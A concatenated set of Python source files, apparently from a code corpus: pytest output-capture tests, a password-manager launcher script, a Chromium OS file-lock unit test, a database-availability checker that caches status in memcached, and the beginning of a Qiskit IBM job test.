assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestCaptureAndPassthroughIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd=<UNSET> _state='done' tmpfile={!r}>".format(
cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
""" for TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n" """
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture", "TeeSysCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value] # noqa: F821
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
|
run.py
|
#!/usr/bin/env python
import argparse
import webbrowser
from multiprocessing import Process, Queue
from threading import Thread
import subprocess
from app import create_app
from app.utils.misc import get_os, get_executable
from app.utils.session_key import SessionKey
processes = {}
queue = Queue(5)
def main():
parser = argparse.ArgumentParser(description='DPass - Distributed & Decentralized Password Manager')
parser.add_argument('--develop', action='store_true', help='Run on development config.')
parser.add_argument('--use_ethereum', action='store_true', help='Launch Ethereum (geth)')
args = parser.parse_args()
app, socketio = create_app('development' if args.develop else 'production', queue,
'ethereum' if args.use_ethereum else 'local')
os = get_os()
if os == 'win32':
print('Windows 32-bit is not supported.')
exit(1)
if os.startswith('win'):
server = Thread(target=socketio.run, args=(app,), kwargs={'use_reloader': False}, daemon=True)
else:
server = Process(target=socketio.run, args=(app,), kwargs={'use_reloader': False})
if args.use_ethereum:
processes['geth'] = subprocess.Popen([get_executable('./geth', 'geth'),
'--datadir',
'./ethereum_private/data/',
'--ethash.dagdir',
'./ethereum_private/data/ethash',
'--networkid',
'1042',
'--targetgaslimit',
'4000000'
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
init_key = SessionKey.generate_key()
queue.put(init_key)
processes['server'] = server
server.start()
webbrowser.open_new_tab('http://localhost:5000/?key=' + init_key)
def terminate():
if isinstance(processes['server'], Process):
# FIXME: may change to terminate server gently
processes['server'].terminate()
processes['server'].join()
if 'geth' in processes:
processes['geth'].terminate()
queue.close()
if __name__ == '__main__':
try:
main()
while True:
input()
if not queue.empty():
print(queue.get())
except (EOFError, KeyboardInterrupt):
terminate()
|
file_lock_machine_test.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""lock_machine.py related unit-tests.
MachineManagerTest tests MachineManager.
"""
from __future__ import print_function
__author__ = 'asharif@google.com (Ahmad Sharif)'
from multiprocessing import Process
import time
import unittest
import file_lock_machine
def LockAndSleep(machine):
file_lock_machine.Machine(machine, '/tmp', auto=True).Lock(exclusive=True)
time.sleep(1)
class MachineTest(unittest.TestCase):
"""Class for testing machine locking."""
def setUp(self):
pass
def testRepeatedUnlock(self):
mach = file_lock_machine.Machine('qqqraymes.mtv', '/tmp')
for _ in range(10):
self.assertTrue(mach.Unlock())
mach = file_lock_machine.Machine('qqqraymes.mtv', '/tmp', auto=True)
for _ in range(10):
self.assertTrue(mach.Unlock())
def testLockUnlock(self):
mach = file_lock_machine.Machine('otter.mtv', '/tmp')
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('otter.mtv', '/tmp', True)
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
def testSharedLock(self):
mach = file_lock_machine.Machine('chrotomation.mtv', '/tmp')
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=False))
for _ in range(10):
self.assertTrue(mach.Unlock(exclusive=False))
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('chrotomation.mtv', '/tmp', auto=True)
for _ in range(10):
self.assertTrue(mach.Lock(exclusive=False))
for _ in range(10):
self.assertTrue(mach.Unlock(exclusive=False))
self.assertTrue(mach.Lock(exclusive=True))
self.assertTrue(mach.Unlock(exclusive=True))
def testExclusiveLock(self):
mach = file_lock_machine.Machine('atree.mtv', '/tmp')
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=True))
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('atree.mtv', '/tmp', auto=True)
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=True))
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
def testExclusiveState(self):
mach = file_lock_machine.Machine('testExclusiveState', '/tmp')
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
mach = file_lock_machine.Machine('testExclusiveState', '/tmp', auto=True)
self.assertTrue(mach.Lock(exclusive=True))
for _ in range(10):
self.assertFalse(mach.Lock(exclusive=False))
self.assertTrue(mach.Unlock(exclusive=True))
def testAutoLockGone(self):
mach = file_lock_machine.Machine('lockgone', '/tmp', auto=True)
p = Process(target=LockAndSleep, args=('lockgone',))
p.start()
time.sleep(1.1)
p.join()
self.assertTrue(mach.Lock(exclusive=True))
def testAutoLockFromOther(self):
mach = file_lock_machine.Machine('other_lock', '/tmp', auto=True)
p = Process(target=LockAndSleep, args=('other_lock',))
p.start()
time.sleep(0.5)
self.assertFalse(mach.Lock(exclusive=True))
p.join()
time.sleep(0.6)
self.assertTrue(mach.Lock(exclusive=True))
def testUnlockByOthers(self):
mach = file_lock_machine.Machine('other_unlock', '/tmp', auto=True)
p = Process(target=LockAndSleep, args=('other_unlock',))
p.start()
time.sleep(0.5)
self.assertTrue(mach.Unlock(exclusive=True))
self.assertTrue(mach.Lock(exclusive=True))
if __name__ == '__main__':
unittest.main()
|
focus.py
|
import multiprocessing
import os
import pylibmc
import pyodbc
from raven import Client
import signal
import time
from logger import logger
from secrets import secrets
if 'DEVELOPMENT' in os.environ:
raven = Client()
else:
raven = Client(secrets['SENTRY_DSN'])
def main():
# How frequent to attempt connection in seconds. Should be low enough to
# discover a non-working connection as soon as possible, but high enough not
# to cause significant load on the database.
check_interval = 1
# How long to wait for connection before timing out. Applies both to
# pyodbc's internal timeout mechanism and our own hard process cutoff
# timeout. In seconds.
timeout = 5
# How long the stored value should be valid. Should never be shorter than
# the value of `check_interval` or `timeout`. In seconds.
cache_time = 10
logger.info(
"initializing with check_interval=%s, timeout=%s, cache_time=%s" % (
check_interval,
timeout,
cache_time,
)
)
host, port = secrets['DATABASES_FOCUS_HOST_PROD'].split(',')
connection_string = ';'.join([
'DRIVER={FreeTDS}',
'SERVER=%s' % host,
'PORT=%s' % port,
'DATABASE=%s' % secrets['DATABASES_FOCUS_NAME_PROD'],
'UID=%s' % secrets['DATABASES_FOCUS_USER_PROD'],
'PWD=%s' % secrets['DATABASES_FOCUS_PASSWORD_PROD'],
])
mc = pylibmc.Client(
["memcached"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True},
)
logger.debug("memcached connection established")
def attempt_connection():
connection = pyodbc.connect(connection_string, timeout=timeout)
cursor = connection.cursor()
cursor.execute('select @@version').fetchall()
cursor.close()
connection.close()
previous_availability = None
while True:
# Note that `timeout` argument will *not* ensure consistent timeouts for
# any connection problem. It sets the ODBC API connection attribute
# SQL_ATTR_LOGIN_TIMEOUT, but not SQL_ATTR_CONNECTION_TIMEOUT.
# See https://github.com/mkleehammer/pyodbc/issues/106
# Therefore, perform the connection in a separate process. pyodbc
# acquires the GIL lock during connection, so signalling or threading
# wouldn't work here.
connection_process = multiprocessing.Process(target=attempt_connection)
connection_process.start()
connection_process.join(timeout)
# If the connection attempt didn't finish, terminate it; it will get a
# non-zero exit code
if connection_process.is_alive():
# connection_process.terminate() sends SIGINT and pyodbc doesn't
# seem to respond to that while blocking. It does respond to SIGHUP,
# so send that.
os.kill(connection_process.pid, signal.SIGHUP)
connection_process.join()
focus_available = connection_process.exitcode == 0
mc.set("focus.connection", focus_available, time=cache_time)
if previous_availability != focus_available:
logger.info("Focus availability changed to %s" % focus_available)
previous_availability = focus_available
time.sleep(check_interval)
if __name__ == '__main__':
try:
main()
raise Exception("Main loop finished unexpectedly")
except Exception:
raven.captureException()
raise
|
test_ibm_job.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""IBMJob Test."""
import time
import copy
from datetime import datetime, timedelta
from unittest import SkipTest, mock
from threading import Thread, Event
from dateutil import tz
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.test import slow_test
from qiskit.test.reference_circuits import ReferenceCircuits
from qiskit.compiler import transpile
from qiskit.result import Result
from qiskit.providers.jobstatus import JobStatus, JOB_FINAL_STATES
from qiskit_ibm import least_busy
from qiskit_ibm.apiconstants import ApiJobStatus, API_JOB_FINAL_STATES
from qiskit_ibm.ibm_backend import IBMRetiredBackend
from qiskit_ibm.exceptions import IBMBackendApiError
from qiskit_ibm.utils.utils import api_status_to_job_status
from qiskit_ibm.job.exceptions import IBMJobTimeoutError, IBMJobNotFoundError
from qiskit_ibm.api.rest.job import Job as RestJob
from qiskit_ibm.api.exceptions import RequestsApiError
from ..ibm_test_case import IBMTestCase
from ..decorators import (requires_provider, requires_device)
from ..utils import (most_busy_backend, cancel_job,
submit_job_bad_shots, submit_and_cancel, submit_job_one_bad_instr)
from ..fake_account_client import BaseFakeAccountClient, CancelableFakeJob
class TestIBMJob(IBMTestCase):
"""Test ibm_job module."""
@classmethod
@requires_provider
def setUpClass(cls, provider):
"""Initial class level setup."""
# pylint: disable=arguments-differ
super().setUpClass()
cls.provider = provider
cls.sim_backend = provider.get_backend('ibmq_qasm_simulator')
cls.bell = transpile(ReferenceCircuits.bell(), cls.sim_backend)
cls.sim_job = cls.sim_backend.run(cls.bell)
cls.last_month = datetime.now() - timedelta(days=30)
@slow_test
@requires_device
def test_run_device(self, backend):
"""Test running in a real device."""
shots = 8192
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
shots=shots)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
result = job.result()
counts_qx = result.get_counts(0)
counts_ex = {'00': shots / 2, '11': shots / 2}
self.assertDictAlmostEqual(counts_qx, counts_ex, shots * 0.2)
# Test fetching the job properties, as this is a real backend and is
# guaranteed to have them.
self.assertIsNotNone(job.properties())
def test_run_multiple_simulator(self):
"""Test running multiple jobs in a simulator."""
num_qubits = 16
qr = QuantumRegister(num_qubits, 'qr')
cr = ClassicalRegister(num_qubits, 'cr')
qc = QuantumCircuit(qr, cr)
for i in range(num_qubits - 1):
qc.cx(qr[i], qr[i + 1])
qc.measure(qr, cr)
num_jobs = 5
job_array = [self.sim_backend.run(transpile([qc] * 20), shots=2048)
for _ in range(num_jobs)]
timeout = 30
start_time = time.time()
while True:
check = sum(
[job.status() is JobStatus.RUNNING for job in job_array])
if check >= 2:
self.log.info('found %d simultaneous jobs', check)
break
if all([job.status() is JobStatus.DONE for job in job_array]):
# done too soon? don't generate error
self.log.warning('all jobs completed before simultaneous jobs '
'could be detected')
break
for job in job_array:
self.log.info('%s %s %s %s', job.status(), job.status() is JobStatus.RUNNING,
check, job.job_id())
self.log.info('- %s', str(time.time() - start_time))
if time.time() - start_time > timeout and self.sim_backend.status().pending_jobs <= 5:
raise TimeoutError('Failed to see multiple running jobs after '
'{0} seconds.'.format(timeout))
